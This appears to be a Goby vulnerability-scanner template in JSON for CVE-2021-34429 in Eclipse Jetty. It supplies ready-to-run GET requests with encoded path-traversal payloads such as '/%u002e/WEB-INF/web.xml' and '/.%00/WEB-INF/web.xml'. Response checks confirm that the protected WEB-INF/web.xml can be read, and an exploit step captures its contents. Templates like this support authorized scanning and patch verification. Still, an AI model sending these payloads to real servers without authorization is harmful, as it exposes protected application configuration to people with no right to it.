{ "Name": "Jetty WEB-INF FileRead CVE-2021-34429", "Level": "1", "Tags": [ "fileread" ], "GobyQuery": "product=\"Jetty\" || product=\"JAVA\" || company=\"Eclipse Foundation, Inc.\"", "Description": "Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. These components are open source and are freely available for commercial use and distribution.", "Product": "Jetty", "Homepage": "https://www.eclipse.org/jetty", "Author": "", "Impact": "For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.", "Recommendation": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm", "References": [ "https://nvd.nist.gov/vuln/detail/CVE-2021-34429", "https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm" ], "HasExp": true, "ExpParams": [ { "Name": "file", "Type": "select", "Value": "/%u002e/WEB-INF/web.xml,/.%00/WEB-INF/web.xml,/a/b/..%00/WEB-INF/web.xml" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "OR", { "Request": { "method": "GET", "uri": "/WEB-INF/web.xml", "follow_redirect": true, "header": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "404", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "Jetty", "bz": "" } ] }, "SetVariable": [] }, { "Request": { "method": "GET", "uri": "/%u002e/WEB-INF/web.xml", "follow_redirect": true, "header": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "web-app", "bz": "" } ] }, "SetVariable": [] }, { "Request": { "method": "GET", "uri": "/.%00/WEB-INF/web.xml", "follow_redirect": true, "header": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "web-app", "bz": "" } ] }, "SetVariable": [] }, { "Request": { "method": "GET", "uri": "/a/b/..%00/WEB-INF/web.xml", "follow_redirect": true, "header": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "web-app", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "{{{file}}}", "follow_redirect": true, "header": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "web-app", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|(.*)" ] } ], "PostTime": "0000-00-00 00:00:00", "GobyVersion": "0.0.0" }